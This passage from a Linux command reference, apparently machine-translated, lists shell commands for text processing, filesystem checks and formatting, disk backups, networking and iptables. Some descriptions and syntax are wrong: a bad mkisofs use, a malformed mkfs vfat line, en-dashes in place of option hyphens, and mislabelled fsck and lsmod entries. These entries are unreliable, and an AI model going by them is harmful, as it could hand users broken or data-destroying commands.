8. apt-cache search searched-package: returns list of packages that corresponds to the series’ wanted packages. ”

View the contents of a file

1. cat file1: view the contents of a file starting from the first row.
2. tac file1: view the contents of a file starting from the last line.
3. more file1: view content along a file.
4. less file1: command like ‘more’ but can save the file movement and backward movement.
5. head -2 file1: see the first two lines of a file.
6. tail -2 file1: see the last two lines of a file.
7. tail -f /var/log/messages: see in real time what has been added to the file.

Text Manipulation

1. cat file1 file2 .. | command <> file1_in.txt_or_file1_out.txt: general syntax for text manipulation using PIPE, STDIN and STDOUT.
2. cat file1 | command( sed, grep, awk, grep, etc…) > result.txt: general syntax to manipulate a text from a file and write the output to a new file.
3. cat file1 | command( sed, grep, awk, grep, etc…) » result.txt: general syntax to manipulate a text from a file and add result in an existing file.
4. grep Aug /var/log/messages: search words “Aug” on file ‘/ var / log / messages’.
5. grep ^Aug /var/log/messages: look for words that begin with “Aug” on file ‘/ var / log / messages’
6. grep [0-9] /var/log/messages: select all lines in the file ‘/ var / log / messages’ that contain numbers.
7. grep Aug -R /var/log/*: search for the string “Aug” in directory ‘/ var / log’ and below.
8. sed ‘s/stringa1/stringa2/g’ example.txt: relocate “string1” with “string2” in example.txt
9. sed ‘/^$/d’ example.txt: delete all blank lines from the example.txt
10. sed ‘/ *#/d; /^$/d’ example.txt: Remove comments and blank lines example.txt
11. echo ‘esempio’ | tr ‘[:lower:]‘ ‘[:upper:]‘: convert lowercase to uppercase
12. sed -e ’1d’ result.txt: deletes the first line of the file sample.txt
13. sed -n ‘/stringa1/p’: display only lines that contain the word “string1”.

Character set and file conversion

1. dos2unix filedos.txt fileunix.txt: convert a text file format from MSDOS to UNIX.
2. unix2dos fileunix.txt filedos.txt: convert a text file format from UNIX to MSDOS.
3. recode ..HTML < page.txt > page.html: convert a text file to html.
4. recode -l | more: show all available format conversions.

Analysis of the file systems

1. badblocks -v /dev/hda1: Check for bad blocks on disk hda1.
2. fsck /dev/hda1: repair / check integrity Linux system file on disk hda1.
3. fsck.ext2 /dev/hda1: repair / check integrity ext 2 file system on disk hda1.
4. e2fsck /dev/hda1: repair / check integrity ext 2 file system on disk hda1.
5. fsck.ext3 /dev/hda1: repair / check integrity ext 3 file system on disk hda1.
6. fsck.vfat /dev/hda1: repair / check integrity ext 3 file system on disk hda1.
7. fsck.msdos /dev/hda1: repair / check integrity of a file from MSDOS system on disk hda1.
8. dosfsck /dev/hda1: repair / check integrity of a file from a DOS system on disk hda1.

Formatting a filesystem

1. mkfs /dev/hda1: create a Linux file system on the partition hda1.
2. mke2fs /dev/hda1: create a system file type on the partition hda1
3. mke2fs -j /dev/hda1: create a Linux file system type ext3 (journal) on hda1 partition.
4. mkfs -t vfat 32 -F /dev/hda1: ccreate a FAT32 file system on hda1.
5. fdformat -n /dev/fd0: flooply format a disk.
6. mkswap /dev/hda3: create a swap file system.

Working with SWAP

1. mkswap /dev/hda3: create a swap file system.
2. swapon /dev/hda3: activate a new swap partition.
3. swapon /dev/hda2 /dev/hdb3: activate two swap partitions.

Backup

1. dump -0aj -f /tmp/home0.bak /home: make a complete backup directory ‘/ home’.
2. dump -1aj -f /tmp/home0.bak /home: make incremental backup directory ‘/ home’.
3. restore -if /tmp/home0.bak: restoring a backup interactively.
4. rsync -rogpav –delete /home /tmp: synchronization between directories.
5. rsync -rogpav -e ssh –delete /home ip_address:/tmp: rsync through SSH tunnel.
6. rsync -az -e ssh –delete ip_addr:/home/public /home/local: synchronize a local directory with a remote directory via ssh and compression.
7. rsync -az -e ssh –delete /home/local ip_addr:/home/public: Synchronize a remote directory with a local directory via ssh and compression.
8. dd bs=1M if=/dev/hda | gzip | ssh user@ip_addr ‘dd of=hda.gz’: make a backup on a hard disk on a remote host via ssh.
9. dd if=/dev/sda of=/tmp/file1: save the contents of a hard drive to a file. (In this case the hard drive is “sda” and the file “file1”).
10. tar -Puf backup.tar /home/user: make incremental backup directory ‘/ home / user’.
11. ( cd /tmp/local/ && tar c . ) | ssh -C user@ip_addr ‘cd /home/share/ && tar x -p’: copy the contents of a directory on a remote directory via ssh.
12. ( tar c /home ) | ssh -C user@ip_addr ‘cd /home/backup-home && tar x -p’: copy a local directory on a remote directory via ssh.
13. tar cf – . | (cd /tmp/backup ; tar xf – ): local copy preserving permits and links from one directory to another.
14. find /home/user1 -name ‘*.txt’ | xargs cp -av –target-directory=/home/backup/ –parents: finding and copying all files with ‘. txt’ from one directory to another.
15. find /var/log -name ‘*.log’ | tar cv –files-from=- | bzip2 > log.tar.bz2: find all files with ‘. log’ and make a bzip file.
16. dd if=/dev/hda of=/dev/fd0 bs=512 count=1: make a copy of MRB (Master Boot Record) to floppy.
17. dd if=/dev/fd0 of=/dev/hda bs=512 count=1: restore the backup of the MBR (Master Boot Record) saved on a floppy.

CD-ROM

1. cdrecord -v gracetime=2 dev=/dev/cdrom -eject blank=fast -force: clean or erase a rewritable cd.
2. mkisofs /dev/cdrom > cd.iso: create an iso image of cdrom on disk.
3. mkisofs /dev/cdrom | gzip > cd_iso.gz: create a compressed iso image of cdrom on disk.
4. mkisofs -J -allow-leading-dots -R -V “Label CD” -iso-level 4 -o ./cd.iso data_cd: create an iso image from a directory.
5. cdrecord -v dev=/dev/cdrom cd.iso: burn an iso image.
6. gzip -dc cd_iso.gz | cdrecord dev=/dev/cdrom -: burn an iso image compression.
7. mount -o loop cd.iso /mnt/iso: mount an iso image.
8. cd-paranoia -B: take songs from a cd to wav files.
9. cd-paranoia – ”-3”: take the first 3 songs from a CD to wav files.
10. cdrecord –scanbus: scan bus to identify the channel scsi.
11. dd if=/dev/hdc | md5sum: to run an md5sum in a device such as a cd.

LAN and Wi-Fi

1. ifconfig eth0: show the configuration of an Ethernet network card.
2. ifup eth0: activate an interface ‘eth0’
3. ifdown eth0: disable an interface ‘eth0’
4. ifconfig eth0 192.168.1.1 netmask 255.255.255.0: set an IP address.
5. ifconfig eth0 promisc: configure ‘eth0’ common mode for packets (sniffing).
6. dhclient eth0: active interface ‘eth0’ dhcp mode.
7. route -n: show route table
8. route add -net 0/0 gw IP_Gateway: default input configuration.
9. route add -net 192.168.0.0 netmask 255.255.0.0 gw 192.168.1.1: Configure static route for network search ‘192 .168.0.0/16’
10. route del 0/0 gw IP_gateway: remove the static route.
11. echo “1” > /proc/sys/net/ipv4/ip_forward: enable ip route.
12. hostname: display the system hostname.
13. host http://www.example.com: hostname search to resolve the name to an IP address (1).
14. nslookup http://www.example.com: find the host name to resolve the name to an IP address and vice versa (2)
15. ip link show: show the link status of all interfaces.
16. mii-tool eth0: show the link status of ‘eth0’
17. ethtool eth0: display statistics for ‘eth0’.
18. netstat -tup: show all active network connections and their PID.
19. netstat -tupl: show all network services listening on the system and its PID.
20. tcpdump tcp port 80: show all HTTP traffic.
21. iwlist scan: show wireless networks.
22. iwconfig eth1: show the configuration of a wireless network card.
23. whois http://www.example.com: search Whois database.

Microsoft Windows Networks (SAMBA)

1. nbtscan ip_addr: net bios name resolution.
2. nmblookup -A ip_addr: net bios name resolution.
3. smbclient -L ip_addr/hostname: show remote actions of a windows host.


IP Tables (FIREWALL)

1. iptables -t filter -L: show all chains of the filter table.
2. iptables -t nat -L: show all chains of the nat table.
3. iptables -t filter -F: clear all rules from the filter table.
4. iptables -t nat -F: clean all nat table rules.
5. iptables -t filter -X: delete any user-created chain.
6. iptables -t filter -A INPUT -p tcp –dport telnet -j ACCEPT: allow input telnet connections.
7. iptables -t filter -A OUTPUT -p tcp –dport http -j DROP: block output HTTP connections.
8. iptables -t filter -A FORWARD -p tcp –dport pop3 -j ACCEPT: allow POP connections to a front chain.
9. iptables -t filter -A INPUT -j LOG –log-prefix “DROP INPUT”: registering an input string.
10. iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE: configure a PAT (Port Address Translation) on eth0, hiding the forced departure packages.
11. iptables -t nat -A PREROUTING -d 192.168.0.1 -p tcp -m tcp –dport 22 -j DNAT –to-destination 10.0.0.2:22: redirect packets directed from one host to another.

Monitoring and debugging

1. top: show cpu processes.
2. ps -eafw: show cpu processes.
3. ps -e -o pid,args –forest: shows Linux processes in a hierarchal manner.
4. pstree: show system processes tree.
5. kill -9 ID_Process: force close and finish process..
6. kill -1 ID_Process: force a process to reload the configuration.
7. lsof -p $$: display a list of files opened by processes.
8. lsof /home/user1: lists open files on a given path by the system.
9. strace -c ls >/dev/null: show system calls made ​​and received by a process.
10. strace -f -e open ls >/dev/null: display library calls.
11. watch -n1 ‘cat /proc/interrupts’: show interruptions in real time.
12. last reboot: show reboot history.
13. lsmod: display the loaded kernel.
14. free -m: Displays the status of RAM in megabytes.
15. smartctl -A /dev/hda: monitor the reliability of a hard drive via SMART.
16. smartctl -i /dev/hda: check if SMART is enabled on a hard disk.
17. tail /var/log/dmesg: show events inherent in the charging process of the kernel.
18. tail /var/log/messages: show system events.

Other useful commands

1. apropos …keyword: display a list of commands that belong to the keywords of a program, are useful when you know what makes your program, but not know the command name.
2. man ping: display manual pages on-line, for example, in a ping command, use the ‘-k’ to find any related command.
3. whatis …keyword: Displays the description of what the program does.
4. mkbootdisk –device /dev/fd0 `uname -r`: create a floppy boteable.
5. gpg -c file1: encrypt a file with GNU security guard.
6. gpg file1.gpg: decode a file with GNU Security Guard.
7. wget -r http://www.example.com: download an entire website.
8. wget -c http://www.example.com/file.iso: download a file with the possibility to stop the download and resume later.
9. echo ‘wget -c http://www.example.com/files.iso‘ | at 09:00: Start a download at any time. In this case begin at 9 am.
10. ldd /usr/bin/ssh: display the shared libraries required by ssh.
11. alias hh=’history’: place an alias for a command-hh = history.
12. chsh: change the command Shell.
13. chsh –list-shells: is an appropriate command to find out if you have to remote into another terminal.
14. who -a: show who is registered, and print time of last import system, dead processes, system logging processes, active processes produced by init, current and past performance of the system clock changes.